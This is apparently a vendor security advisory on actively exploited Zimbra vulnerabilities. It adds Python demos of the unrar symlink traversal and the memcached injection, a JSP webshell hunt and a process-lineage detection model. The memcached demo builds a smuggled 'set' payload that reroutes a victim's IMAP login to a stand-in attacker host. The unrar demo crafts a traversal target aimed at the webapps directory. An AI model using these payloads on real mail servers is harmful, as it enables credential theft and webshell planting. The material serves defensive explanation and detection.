Last updated at Fri, 26 Aug 2022 20:41:55 GMT
Over the past few weeks, five different vulnerabilities affecting Zimbra Collaboration Suite have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the latest version on an urgent basis, and to apply future security releases as quickly as possible once they are available.
Exploited RCE vulnerabilities
The following vulnerabilities can be used for remote code execution and are being exploited in the wild.
CVE-2022-30333 is a path traversal vulnerability in unRAR, Rarlab's command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes unrar. Zimbra Collaboration Suite invokes a vulnerable version of unrar (specifically, from the amavisd component, which is used to inspect incoming emails for spam and malware, and which unpacks attached archives to scan them). Zimbra addressed this issue in 9.0.0 patch 25 and 8.8.15 patch 32 by replacing
Our research team has a full analysis of CVE-2022-30333 in AttackerKB. A Metasploit module is also available. Note that the server does not necessarily need to be internet-facing to be exploited — it simply needs to receive a malicious email.
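The root cause of CVE-2022-30333 is an ordering bug: on Unix, unrar validated a symlink target (rejecting absolute paths and `..` components, treating only `/` as a separator) and only afterwards converted backslashes to forward slashes. A target written as `..\..\..\target` therefore passed the check and then became `../../../target`. The next archive entry written through that link lands wherever the link points, which is how a JSP file ends up under a web application directory. The following Python model is an added example, not Zimbra's or Rarlab's code: the function names, the `EXTRACT_DIR` path and the `EVIL_TARGET` value are constructed for the demo, and the check is simplified (real unrar also compares the number of `..` steps with the link's own depth).

```python
import posixpath
from typing import Optional

# Constructed example path for the directory the mail scanner unpacks into.
EXTRACT_DIR = "/tmp/unpack/work"
# Constructed symlink target: '..' steps written with backslashes.
EVIL_TARGET = "..\\..\\..\\opt/zimbra/jetty/webapps/zimbra/public"


def is_relative_symlink_safe(target: str) -> bool:
    """Model of unrar's Unix symlink check: the target may not be absolute and
    may not contain a '..' component, where only '/' counts as a separator."""
    if target.startswith("/"):
        return False
    return ".." not in target.split("/")


def dos_slash_to_unix(path: str) -> str:
    """Model of unrar's DosSlashToUnix: every backslash becomes a slash."""
    return path.replace("\\", "/")


def link_target_vulnerable(target: str) -> Optional[str]:
    """unrar 6.11 ordering: validate the raw target, convert separators afterwards,
    so '..\\' is never recognised as a parent-directory step by the check."""
    if not is_relative_symlink_safe(target):
        return None
    return dos_slash_to_unix(target)


def link_target_fixed(target: str) -> Optional[str]:
    """unrar 6.12 ordering: normalise separators first, then validate."""
    target = dos_slash_to_unix(target)
    if not is_relative_symlink_safe(target):
        return None
    return target


def resolved_link(extract_dir: str, accepted_target: Optional[str]) -> Optional[str]:
    """Where a symlink created inside extract_dir with this target would point."""
    if accepted_target is None:
        return None
    return posixpath.normpath(posixpath.join(extract_dir, accepted_target))


def demo() -> dict:
    """Resolve the constructed target under both orderings, plus a benign target."""
    return {
        "vulnerable": resolved_link(EXTRACT_DIR, link_target_vulnerable(EVIL_TARGET)),
        "fixed": resolved_link(EXTRACT_DIR, link_target_fixed(EVIL_TARGET)),
        "benign": resolved_link(EXTRACT_DIR, link_target_fixed("docs/readme.txt")),
    }


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:10s} -> {path}")
```

Under the vulnerable ordering the link resolves to a directory far outside `EXTRACT_DIR`; under the fixed ordering the same target is refused, while an ordinary relative target still extracts where expected. The same pattern (validate, then transform) is worth looking for in any archive or upload handler, not just unrar.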
CVE-2022-27924 is a blind Memcached injection vulnerability first analyzed publicly in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user's credentials when that user attempts to authenticate. Combined with CVE-2022-27925, a remote code execution vulnerability that requires administrator credentials, and CVE-2022-37393, a currently unpatched privilege escalation issue that was publicly disclosed in October 2021, capturing an administrator's password can lead to remote code execution as the root user on an organization's email server, which frequently contains sensitive data.
Our research team has a full analysis of CVE-2022-27924 in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for any user by stacking multiple requests.
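The injection works because Zimbra's route lookup placed an attacker-supplied username straight into a memcached text-protocol line, and memcached separates commands with `\r\n`. A username that contains a line break ends the `get` and appends a `set` for somebody else's route key, pointing the victim's IMAP session at a host the attacker controls. The following is an added example, not Zimbra's code: the key layout `route:proto=imap;user=<user>` is an approximation of the real one, `198.51.100.7` is a documentation address standing in for an attacker-run IMAP server, and the small protocol reader exists only to show what memcached would see on the wire.

```python
from typing import List, Tuple


def route_key(username: str) -> str:
    """Approximation of the cache key the nginx route lookup uses per user."""
    return f"route:proto=imap;user={username}"


def build_get_vulnerable(username: str) -> bytes:
    """Pre-patch behaviour: the username goes into the protocol line unchecked."""
    return f"get {route_key(username)}\r\n".encode()


def build_get_hardened(username: str) -> bytes:
    """Refuse anything that cannot be a memcached key: control characters,
    whitespace (0x00-0x20), DEL, or more than 250 bytes."""
    key = route_key(username)
    if len(key.encode()) > 250 or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in key):
        raise ValueError("username is not a valid memcached key component")
    return f"get {key}\r\n".encode()


def parse_commands(stream: bytes) -> List[Tuple[str, ...]]:
    """Minimal memcached text-protocol reader: one tuple per command; a 'set'
    also consumes the data block on the following line."""
    lines = stream.split(b"\r\n")
    commands: List[Tuple[str, ...]] = []
    i = 0
    while i < len(lines):
        parts = lines[i].decode(errors="replace").split(" ")
        if parts == [""]:
            i += 1
            continue
        if parts[0] == "set":
            # set <key> <flags> <exptime> <bytes>\r\n<data>\r\n
            data = lines[i + 1].decode(errors="replace") if i + 1 < len(lines) else ""
            commands.append(("set", parts[1], data))
            i += 2
        else:
            commands.append(tuple(parts))
            i += 1
    return commands


VICTIM = "victim@example.com"
ATTACKER_IMAP = "198.51.100.7:143"
# Constructed payload: the "username" closes the get line and adds a set for
# the victim's route key; the byte count must match the data that follows.
INJECTED_USER = f"x\r\nset {route_key(VICTIM)} 0 0 {len(ATTACKER_IMAP)}\r\n{ATTACKER_IMAP}"


def demo_vulnerable() -> List[Tuple[str, ...]]:
    """What memcached receives when the unchecked username is sent."""
    return parse_commands(build_get_vulnerable(INJECTED_USER))


def demo_hardened() -> str:
    """The same username against the validating builder."""
    try:
        build_get_hardened(INJECTED_USER)
        return "accepted"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    for command in demo_vulnerable():
        print(command)
    print("hardened builder:", demo_hardened())
```

The vulnerable builder yields two commands, the second of which rewrites the victim's route to the attacker's host; the hardened builder rejects the input before anything reaches the cache. Validating the key is the application-side fix, but it does not replace keeping memcached off the network, which the mitigation section below recommends regardless of patch level.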
CVE-2022-27925 is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. On August 10, 2022, security firm Volexity published findings from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 without authentication.
Note: Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are:
- Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
- Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
Our research team has a full analysis of CVE-2022-27925 in AttackerKB.
Unpatched privilege escalation CVE-2022-37393
In October of 2021, researcher Darren Martyn published an exploit for a zero-day root privilege escalation vulnerability in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the zimbra user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.
Our research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned CVE-2022-37393 (still awaiting NVD analysis) to track it. A full analysis of CVE-2022-37393 is available in AttackerKB. A Metasploit module is also available.
We strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring Zimbra’s release communications for future security updates, and patching on an urgent basis when new versions become available.
The AttackerKB analyses for CVE-2022-30333, CVE-2022-27924, CVE-2022-27925, and CVE-2022-37393 all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity’s blog also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published lists of valid JSP files included in Zimbra installations for the latest version of 8.8.15 and of 9.0.0 (at time of writing).
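The JSP comparison Volexity describes is simple to script: enumerate every `.jsp` under the Jetty webapps tree, subtract the files a clean install ships, and treat the remainder as candidates for webshells dropped through mboximport, through unrar, or by an attacker who already has a shell. The script below is an added example, not Volexity's or Zimbra's tooling. The `BASELINE` names and the temporary directory tree built by `demo()` are constructed for illustration; for a real check, load one of the published per-version lists as the baseline and point `unexpected_jsp` at `/opt/zimbra/jetty/webapps`.

```python
import os
import tempfile
from typing import Iterable, List, Set


def list_jsp(root: str) -> Set[str]:
    """Relative, forward-slash paths of every .jsp file under root (any case)."""
    found: Set[str] = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jsp"):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.add(rel.replace(os.sep, "/"))
    return found


def unexpected_jsp(root: str, baseline: Iterable[str]) -> List[str]:
    """JSP files present on disk that are not in the known-good list.
    Files missing from disk are not reported: only additions matter here."""
    return sorted(list_jsp(root) - set(baseline))


# Constructed baseline with illustrative names; substitute the real list
# for the installed Zimbra version when running this for real.
BASELINE = [
    "zimbra/public/launch.jsp",
    "zimbra/public/jsp/status.jsp",
    "zimbraAdmin/public/jsp/index.jsp",
]


def _touch(root: str, rel: str) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write("<%-- constructed sample file --%>\n")


def demo() -> List[str]:
    """Build a throwaway tree holding most of the baseline plus two extra JSPs
    (one with an upper-case extension) and return what the hunt reports."""
    root = tempfile.mkdtemp(prefix="zimbra-jsp-demo-")
    for rel in BASELINE[:2]:          # one baseline file deliberately absent
        _touch(root, rel)
    _touch(root, "zimbra/public/jsp/update.jsp")   # constructed: not in baseline
    _touch(root, "zimbraAdmin/Startup1.JSP")       # constructed: not in baseline
    return unexpected_jsp(root, BASELINE)


if __name__ == "__main__":
    for rel in demo():
        print("unexpected JSP:", rel)
```

A positive hit is a starting point, not a verdict: confirm by inspecting the file, its modification time relative to the last patch, and the Jetty request logs for that path. The match is case-insensitive on the extension so that a renamed `.JSP` does not slip through the comparison, even though Jetty itself would not serve it as a JSP; extending the suffix list to other server-side extensions is a one-line change.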
Finally, we recommend blocking internet traffic to Zimbra servers wherever possible and configuring Zimbra so that its Memcached instance (TCP port 11211 by default) is not reachable from outside the Zimbra hosts themselves, even on patched versions of Zimbra.
Vulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.
InsightIDR: Customers should look for alerts generated by InsightIDR’s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:
- Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter
- Suspicious Process - “Zimbra” User Runs Shell or Script Interpreter
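The two detections above reduce to process-lineage checks: a script interpreter whose parent is Zimbra's web tier (Jetty, which runs as a java process out of /opt/zimbra/mailboxd, fronted by nginx), and a script interpreter running as the zimbra account. The second will fire constantly without tuning, because Zimbra's own maintenance (zmcontrol, the zmstat collectors, cron jobs) runs shell and perl as zimbra all day. The code below is an added example, not InsightIDR's rule logic: the event dictionaries are constructed, the "mailboxd" substring match and the exclusion for scripts under /opt/zimbra/bin and /opt/zimbra/libexec are tuning assumptions, and the rule names are taken from the list above.

```python
from typing import Dict, List, Tuple

INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby", "php"}
RULE_WEBSERVER = "Zimbra Collaboration Suite Webserver Spawns Script Interpreter"
RULE_USER = '"Zimbra" User Runs Shell or Script Interpreter'
# Tuning assumption: Zimbra's own scripts live here and legitimately run as zimbra.
TOOLING_DIRS = ("/opt/zimbra/bin/", "/opt/zimbra/libexec/")


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def is_interpreter(image: str) -> bool:
    return basename(image) in INTERPRETERS


def is_zimbra_webserver(ev: Dict[str, str]) -> bool:
    """Parent is nginx, or a java process whose command line references mailboxd."""
    parent = basename(ev["parent_image"])
    return parent == "nginx" or (parent == "java" and "mailboxd" in ev["parent_cmdline"])


def is_zimbra_tooling(cmdline: str) -> bool:
    """Exclusion: the interpreter's first argument is a script shipped with Zimbra.
    Note this only matches a script path in argv[1]; 'bash -c ...' never qualifies."""
    argv = cmdline.split()
    return len(argv) > 1 and argv[1].startswith(TOOLING_DIRS)


def evaluate(ev: Dict[str, str]) -> List[str]:
    hits: List[str] = []
    if not is_interpreter(ev["image"]):
        return hits
    if is_zimbra_webserver(ev):
        hits.append(RULE_WEBSERVER)
    if ev["user"] == "zimbra" and not is_zimbra_tooling(ev["cmdline"]):
        hits.append(RULE_USER)
    return hits


def run(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    return [(int(ev["id"]), rule) for ev in events for rule in evaluate(ev)]


# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"id": "1", "user": "zimbra", "parent_image": "/opt/zimbra/common/lib/jvm/java/bin/java",
     "parent_cmdline": "java -Djetty.home=/opt/zimbra/mailboxd -jar /opt/zimbra/mailboxd/start.jar",
     "image": "/bin/sh", "cmdline": "sh -c id"},
    {"id": "2", "user": "zimbra", "parent_image": "/usr/sbin/cron", "parent_cmdline": "/usr/sbin/CRON",
     "image": "/usr/bin/perl", "cmdline": "perl /opt/zimbra/libexec/zmstat-cpu"},
    {"id": "3", "user": "zimbra", "parent_image": "/opt/zimbra/common/sbin/nginx",
     "parent_cmdline": "nginx: worker process",
     "image": "/bin/bash", "cmdline": "bash -i"},
    {"id": "4", "user": "www-data", "parent_image": "/usr/sbin/apache2", "parent_cmdline": "apache2 -k start",
     "image": "/bin/sh", "cmdline": "sh -c ls"},
]


if __name__ == "__main__":
    for event_id, rule in run(EVENTS):
        print(event_id, rule)
```

Events 1 and 3 trip both rules, the cron-driven zmstat collector is suppressed by the tooling exclusion, and the unrelated Apache event is ignored. Keep the exclusion narrow: an attacker who has write access under /opt/zimbra can plant a script there, so the excluded paths should be paired with file-integrity monitoring rather than trusted outright.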
The Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.